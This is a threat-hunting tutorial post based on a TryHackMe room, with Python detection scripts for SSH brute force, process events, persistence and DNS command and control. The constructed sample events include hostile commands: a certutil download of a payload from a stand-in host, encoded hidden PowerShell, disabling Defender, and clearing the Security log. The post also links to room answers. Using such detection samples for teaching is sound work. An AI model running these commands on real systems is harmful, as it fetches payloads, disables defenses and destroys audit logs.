Threat Hunting Techniques in Cyber Security | TryHackMe Threat Hunting: Foothold

Motasem Hamdan
3 min read · May 23, 2024


We covered threat hunting in depth, compared threat hunting with incident response, and walked through a MITRE ATT&CK-based approach to hunting for attacker tactics and techniques such as initial access, execution, defense evasion and persistence using the Elastic Stack and Kibana. We used the TryHackMe room Threat Hunting: Foothold as the practical scenario for the demonstration.

Threat Hunting | Initial Access

The Initial Access Tactic (TA0001) represents adversaries’ techniques and strategies to breach an organisation. This stage of an attack cycle predominantly focuses on delivering the payload to the target system or network. The primary objective during this phase is to gain a foothold in the network, which can be achieved through a variety of means, such as:

  • Social Engineering techniques such as phishing.
  • Exploiting vulnerabilities through public-facing servers.
  • Spraying credentials through exposed authentication endpoints.
  • Executing commands through malicious flash drives.
  • Installing cracked software with hidden malicious code.

As the attack techniques are varied, our hunting strategies should also be multifaceted and adaptable. Our goal is to identify signs of the various methods outlined above. Hence, we will use the following scenarios to build our hunting methodology:

  • Brute-forcing attempts via SSH.
  • Exploitation of a web application vulnerability.
  • Phishing via links and attachments.
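The first scenario, brute forcing over SSH, is the easiest one to turn into a concrete hunt. The block below is an added example and not code from the room or the article: it parses constructed OpenSSH `auth.log`-style lines (the hostnames, usernames and IP addresses are made up), counts failed logins per source address inside a sliding time window, and then checks for the signal that actually matters for a foothold, a successful login from the same address after the burst. The threshold and window are assumptions to tune against your own baseline.

```python
"""Hunt for SSH brute-force attempts followed by a successful login.

Added example, not from the TryHackMe room or the article. The log lines
below are constructed to look like OpenSSH syslog output.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: a burst of failures from 203.0.113.7 ending in a
# success, plus ordinary activity (one typo, then success) from 198.51.100.5.
SAMPLE_AUTH_LOG = """\
May 23 10:00:01 web01 sshd[2201]: Failed password for invalid user admin from 203.0.113.7 port 50122 ssh2
May 23 10:00:02 web01 sshd[2203]: Failed password for invalid user test from 203.0.113.7 port 50124 ssh2
May 23 10:00:03 web01 sshd[2205]: Failed password for root from 203.0.113.7 port 50126 ssh2
May 23 10:00:04 web01 sshd[2207]: Failed password for root from 203.0.113.7 port 50128 ssh2
May 23 10:00:05 web01 sshd[2209]: Failed password for ubuntu from 203.0.113.7 port 50130 ssh2
May 23 10:00:07 web01 sshd[2211]: Accepted password for ubuntu from 203.0.113.7 port 50132 ssh2
May 23 10:15:00 web01 sshd[2301]: Accepted publickey for deploy from 198.51.100.5 port 40000 ssh2
May 23 10:20:00 web01 sshd[2305]: Failed password for deploy from 198.51.100.5 port 40002 ssh2
May 23 10:20:10 web01 sshd[2307]: Accepted password for deploy from 198.51.100.5 port 40004 ssh2
"""

# Matches both "Failed password for invalid user X" and "Accepted publickey for X".
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_auth_log(text, year=2024):
    """Return (timestamp, result, user, ip) tuples for sshd auth lines.

    syslog timestamps carry no year, so the caller supplies one (assumption).
    """
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["ip"]))
    return events


def hunt_ssh_bruteforce(text, threshold=5, window=timedelta(minutes=5)):
    """Return {ip: finding} for sources with >= threshold failures inside
    one window, recording whether a success from that source followed."""
    by_ip = defaultdict(list)
    for ev in parse_auth_log(text):
        by_ip[ev[3]].append(ev)

    findings = {}
    for ip, evs in by_ip.items():
        evs.sort()
        failures = [e for e in evs if e[1] == "Failed"]
        # Sliding window over failure timestamps: find the first burst.
        burst_end = None
        for i in range(len(failures)):
            j = i
            while j < len(failures) and failures[j][0] - failures[i][0] <= window:
                j += 1
            if j - i >= threshold:
                burst_end = failures[j - 1][0]
                break
        if burst_end is None:
            continue
        later_success = [e for e in evs if e[1] == "Accepted" and e[0] >= burst_end]
        findings[ip] = {
            "failures": len(failures),
            "usernames": sorted({e[2] for e in failures}),
            # The account that finally worked, i.e. the foothold to pivot on.
            "success_after_burst": later_success[0][2] if later_success else None,
        }
    return findings


if __name__ == "__main__":
    for ip, f in hunt_ssh_bruteforce(SAMPLE_AUTH_LOG).items():
        print(ip, f)
```

The same logic maps directly onto a Kibana visualisation: bucket `event.outcome: failure` by `source.ip` over a date histogram, then pivot on any bucket that crosses the threshold to look for a later `event.outcome: success` from the same address.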

Threat Hunting | Execution Phase

The Execution phase can manifest in several ways, and recognising these signs can be complex due to the many potential execution methods an adversary might employ. However, it all boils down to executing a malicious command.

Unusual process creation, network connections, file modifications, and many more traces can indicate malicious execution. Recognising these red flags requires an in-depth understanding of typical endpoint behaviour and a keen eye for spotting anomalies. In line with these, we will use the following scenarios to build our hunting methodology:

  • Suspicious usage of command-line tools.
  • Abuse of built-in system tools.
  • Execution via programming/scripting tools.

Threat Hunting | Defense Evasion Phase

Despite adversaries' attempts to evade detection, their activities inevitably leave traces in endpoint and security logs (process creation, service and registry changes, event-log operations), providing us with potential leads. With these, we will use the following scenarios to uncover the traces of this tactic:

  • Disabling security software.
  • Log deletion attempts.
  • Executing shellcode through process injection.
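The Execution scenarios above (suspicious command-line tools, abuse of built-in tools, scripting-language execution) and the Defense Evasion scenarios (disabling security software, clearing logs, process injection) are all hunted from the same telemetry, so one rule-based pass over process and thread events serves both. The block below is an added example, not the room's or the article's code: the events are constructed dictionaries shaped loosely like Sysmon Event ID 1 (process create) and Event ID 8 (CreateRemoteThread); the hostnames, paths and command lines are invented, and the rules are deliberately narrow examples rather than a complete rule set.

```python
"""Rule-based hunt over process-create and remote-thread events.

Added example, not code from the TryHackMe room or the article. EVENTS is a
constructed sample shaped after Sysmon Event ID 1 and Event ID 8 fields.
"""
import re

EVENTS = [
    # Execution: Word spawning PowerShell with an encoded command.
    {"id": 1, "host": "ws01", "parent": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    # Execution: built-in tool (certutil) used as a downloader.
    {"id": 1, "host": "ws01", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://example.test/payload.dat C:\Users\Public\p.dat"},
    # Defense evasion: real-time protection switched off, then Security log cleared.
    {"id": 1, "host": "ws01", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"id": 1, "host": "ws01", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wevtutil.exe", "cmdline": "wevtutil.exe cl Security"},
    # Defense evasion: thread created in another process from a user-writable path.
    {"id": 8, "host": "ws01", "source_image": r"C:\Users\Public\p.exe",
     "target_image": r"C:\Windows\explorer.exe"},
    # Benign: an admin running a normal command from cmd.
    {"id": 1, "host": "ws02", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\ipconfig.exe", "cmdline": "ipconfig /all"},
    # Benign: remote thread by an OS component.
    {"id": 8, "host": "ws02", "source_image": r"C:\Windows\System32\csrss.exe",
     "target_image": r"C:\Windows\System32\svchost.exe"},
]

OFFICE_APPS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe")
ENCODED_FLAG = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\s")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def _cmd(ev):
    return ev.get("cmdline", "").lower()


# (rule name, ATT&CK tactic, predicate over one event). Every predicate checks
# the event id first so it never touches fields the other event type lacks.
RULES = [
    ("office_spawns_shell", "Execution",
     lambda ev: ev["id"] == 1 and basename(ev["parent"]) in OFFICE_APPS
     and basename(ev["image"]) in SHELLS),
    ("encoded_powershell", "Execution",
     lambda ev: ev["id"] == 1 and basename(ev["image"]) in ("powershell.exe", "pwsh.exe")
     and ENCODED_FLAG.search(_cmd(ev)) is not None),
    ("certutil_download", "Execution",
     lambda ev: ev["id"] == 1 and basename(ev["image"]) == "certutil.exe"
     and "urlcache" in _cmd(ev)),
    ("defender_realtime_disabled", "Defense Evasion",
     lambda ev: ev["id"] == 1 and "set-mppreference" in _cmd(ev)
     and "disablerealtimemonitoring" in _cmd(ev)),
    ("event_log_cleared", "Defense Evasion",
     lambda ev: ev["id"] == 1 and (
         (basename(ev["image"]) == "wevtutil.exe" and re.search(r"\s(cl|clear-log)\s", _cmd(ev)))
         or "clear-eventlog" in _cmd(ev))),
    ("remote_thread_injection", "Defense Evasion",
     lambda ev: ev["id"] == 8
     and not ev["source_image"].lower().startswith("c:\\windows\\system32")
     and basename(ev["source_image"]) != basename(ev["target_image"])),
]


def hunt(events, rules=RULES):
    """Return one finding per (event, matching rule) pair."""
    findings = []
    for ev in events:
        for name, tactic, pred in rules:
            if pred(ev):
                evidence = ev.get("cmdline") or f'{ev["source_image"]} -> {ev["target_image"]}'
                findings.append({"host": ev["host"], "rule": name,
                                 "tactic": tactic, "evidence": evidence})
    return findings


if __name__ == "__main__":
    for f in hunt(EVENTS):
        print(f"{f['host']}  {f['tactic']:<16} {f['rule']:<28} {f['evidence']}")
```

Note that one event can match several rules (the Word-to-PowerShell event trips both the parent/child rule and the encoded-command rule); stacking weak signals on the same host and time window is what turns individual rule hits into a hunt lead. The remote-thread rule's System32 exclusion is a noise-reduction assumption, not a safe allowlist: attackers do inject from signed system binaries, so treat it as a starting filter.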

Threat Hunting | Persistence Phase

The hunt for persistence involves detecting subtle changes to the system. This may entail identifying unrecognised or unexpected scripts running at startup, spotting unusual scheduled tasks, or noticing irregularities in registry keys such as the Run keys. We will use the following scenarios to learn more about the traces left when threat actors implant persistence mechanisms:

  • Scheduled Task creation.
  • Registry key modification.
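Because persistence shows up as a change to the host rather than as a single event, a useful complement to event-based hunting is diffing a known-good inventory of scheduled tasks and Run-key values against the current one. The block below is an added example, not code from the room or the article: both snapshots are constructed, the task names, registry paths and binaries are invented, and the triage score is a small set of heuristics (user-writable path, script host as the persisted command, encoded command, a system binary name living outside `C:\Windows`) that you would extend from your own environment.

```python
"""Baseline-diff hunt for persistence in scheduled tasks and Run keys.

Added example, not code from the TryHackMe room or the article. BASELINE and
CURRENT are constructed snapshots of the same host; nothing here is real.
"""
import re

# Constructed "known good" inventory captured at build time.
BASELINE = {
    "tasks": {
        r"\Microsoft\Windows\Defrag\ScheduledDefrag": r"C:\Windows\System32\defrag.exe -c -h",
        r"\Microsoft\Windows\WindowsUpdate\Scheduled Start": r"C:\Windows\System32\sc.exe start wuauserv",
    },
    "run_keys": {
        r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealth":
            r"C:\Windows\System32\SecurityHealthSystray.exe",
    },
}

# Constructed "current" inventory from the same host, after the intrusion.
CURRENT = {
    "tasks": {
        r"\Microsoft\Windows\Defrag\ScheduledDefrag": r"C:\Windows\System32\defrag.exe -c -h",
        r"\Microsoft\Windows\WindowsUpdate\Scheduled Start": r"C:\Windows\System32\sc.exe start wuauserv",
        r"\Updater": "powershell.exe -w hidden -enc SQBFAFgA",               # new: encoded PowerShell
    },
    "run_keys": {
        r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealth":
            r"C:\Windows\System32\SecurityHealthSystray.exe",
        r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive":
            r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",  # new: known good
        r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svchost":
            r"C:\Users\alice\AppData\Roaming\svchost.exe",                    # new: masquerading
    },
}

USER_WRITABLE = re.compile(r"\\(users|programdata|temp|appdata)\\", re.I)
SCRIPT_HOSTS = re.compile(r"(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32|regsvr32)\.exe", re.I)
ENCODED_FLAG = re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I)
SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "explorer.exe", "winlogon.exe"}
KNOWN_GOOD = {"onedrive.exe"}   # assumed allowlist of vetted autostart binaries


def _binary(cmd):
    """Executable name from a command line (simplification: first token,
    so unquoted paths containing spaces are not handled)."""
    return cmd.strip().split(" ", 1)[0].rsplit("\\", 1)[-1].lower()


def score(command):
    """Return the list of reasons a new/changed persistence entry looks bad."""
    exe = _binary(command)
    if exe in KNOWN_GOOD:
        return []
    reasons = []
    if USER_WRITABLE.search(command):
        reasons.append("runs from user-writable path")
    if SCRIPT_HOSTS.search(command):
        reasons.append("script host as persistence target")
    if ENCODED_FLAG.search(command):
        reasons.append("encoded command")
    if exe in SYSTEM_NAMES and not command.lower().startswith("c:\\windows\\"):
        reasons.append("system binary name outside C:\\Windows")
    return reasons


def diff_persistence(baseline, current):
    """Return every task/Run-key entry that is new or changed since baseline."""
    findings = []
    for kind in ("tasks", "run_keys"):
        for name, cmd in current[kind].items():
            old = baseline[kind].get(name)
            if old == cmd:
                continue
            findings.append({"kind": kind, "name": name, "command": cmd,
                             "change": "added" if old is None else "modified",
                             "reasons": score(cmd)})
    return findings


if __name__ == "__main__":
    for f in diff_persistence(BASELINE, CURRENT):
        print(f["change"], f["kind"], f["name"], "->", f["reasons"] or "no heuristic hit")
```

Entries that changed but score no reasons (here the OneDrive Run key) still deserve a glance, because the allowlist only says the binary name is expected, not that the path or arguments are. In Elastic this diff is the same idea as comparing Sysmon Event ID 12/13 registry events and task-creation events against a baseline of approved values.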

Threat Hunting | Command and Control Phase

The hunt for Command and Control involves uncovering the covert channel an implant uses to reach its operator amidst regular network traffic. Adversaries use standard protocols to blend in with typical network traffic, or use cloud storage services as unconventional command channels, to avoid raising suspicion. In the following sections, we will delve deeper into strategies and techniques for hunting Command and Control activity, interpreting network events and recognising anomalies through the following scenarios:

  • Command and Control over DNS.
  • Command and Control over third-party cloud applications.
  • Command and Control over encrypted HTTP traffic.
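C2 over DNS is the scenario where the anomaly is most visible in the data itself: the implant encodes its traffic into query names, so a single client produces many unique, long, high-entropy subdomains under one parent domain, often as TXT lookups. The block below is an added example, not code from the room or the article. It parses a constructed resolver log (the clients and domains are invented, and `c2.invalid` is a reserved name that never resolves), groups queries by client and parent domain, computes per-group statistics, and flags groups that cross all thresholds. The thresholds and the two-label parent-domain rule are assumptions; real hunts use the public suffix list.

```python
"""Hunt for DNS-based command and control in resolver query logs.

Added example, not code from the TryHackMe room or the article. The log
lines are constructed; each C2 label is 32 hex characters.
"""
import math
from collections import Counter, defaultdict

SAMPLE_DNS_LOG = """\
10:00:01 client=10.0.0.15 query=A name=www.example.com
10:00:02 client=10.0.0.15 query=A name=cdn.example.com
10:00:03 client=10.0.0.15 query=A name=mail.example.com
10:00:10 client=10.0.0.15 query=TXT name=0123456789abcdef0123456789abcdef.c2.invalid
10:00:40 client=10.0.0.15 query=TXT name=fedcba9876543210fedcba9876543210.c2.invalid
10:01:10 client=10.0.0.15 query=TXT name=02468ace13579bdf02468ace13579bdf.c2.invalid
10:01:40 client=10.0.0.15 query=TXT name=13579bdf02468ace13579bdf02468ace.c2.invalid
10:02:10 client=10.0.0.15 query=TXT name=a1b2c3d4e5f60718293a4b5c6d7e8f90.c2.invalid
10:02:40 client=10.0.0.15 query=TXT name=9f8e7d6c5b4a39281706f5e4d3c2b1a0.c2.invalid
10:03:00 client=10.0.0.22 query=A name=www.example.com
10:03:05 client=10.0.0.22 query=A name=static.example.com
"""


def parse_dns_log(text):
    """Return (client, qtype, name) tuples from key=value log lines."""
    events = []
    for line in text.splitlines():
        fields = dict(kv.split("=", 1) for kv in line.split()[1:])
        events.append((fields["client"], fields["query"], fields["name"].lower().rstrip(".")))
    return events


def shannon_entropy(s):
    """Bits per character; 32 hex chars with each digit twice gives exactly 4.0."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def registered_domain(name):
    # Simplification (assumption): last two labels. Use the public suffix
    # list in production, or "example.co.uk" collapses to "co.uk".
    return ".".join(name.split(".")[-2:])


def hunt_dns_c2(text, min_queries=5, min_label_len=20, min_entropy=3.5):
    """Return {(client, parent_domain): stats} with a 'suspicious' flag."""
    groups = defaultdict(list)
    for client, qtype, name in parse_dns_log(text):
        groups[(client, registered_domain(name))].append((qtype, name))

    results = {}
    for key, qs in groups.items():
        parent = key[1]
        subs = {n[: -len(parent) - 1] for _, n in qs if n != parent}
        first_labels = [s.split(".")[0] for s in subs if s]
        if not first_labels:
            continue
        stats = {
            "queries": len(qs),
            "unique_subdomains": len(subs),
            "avg_label_len": sum(map(len, first_labels)) / len(first_labels),
            "avg_entropy": sum(map(shannon_entropy, first_labels)) / len(first_labels),
            "txt_ratio": sum(1 for t, _ in qs if t == "TXT") / len(qs),
        }
        # Require volume, uniqueness, length and randomness together; any one
        # alone is common in CDN and telemetry traffic.
        stats["suspicious"] = (
            stats["queries"] >= min_queries
            and stats["unique_subdomains"] >= min_queries
            and stats["avg_label_len"] >= min_label_len
            and stats["avg_entropy"] >= min_entropy
        )
        results[key] = stats
    return results


if __name__ == "__main__":
    for (client, domain), s in hunt_dns_c2(SAMPLE_DNS_LOG).items():
        flag = "SUSPICIOUS" if s["suspicious"] else "ok"
        print(f"{client:<12} {domain:<14} q={s['queries']:<3} uniq={s['unique_subdomains']:<3} "
              f"len={s['avg_label_len']:.1f} H={s['avg_entropy']:.2f} txt={s['txt_ratio']:.2f} {flag}")
```

The same features translate into Kibana aggregations: a cardinality of `dns.question.subdomain` per `source.ip` and `dns.question.registered_domain`, plus a scripted or ingest-time field for label length and entropy. The beaconing interval (here a query every 30 seconds) is a further signal worth adding once volume alone has narrowed the candidates.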

Room Answers | Threat Hunting: Foothold

Room answers can be found here.

Video Walkthrough | Threat Hunting: Foothold



Written by Motasem Hamdan

Motasem Hamdan is a content creator and swimmer who creates cyber security training videos and articles. https://www.youtube.com/@MotasemHamdan
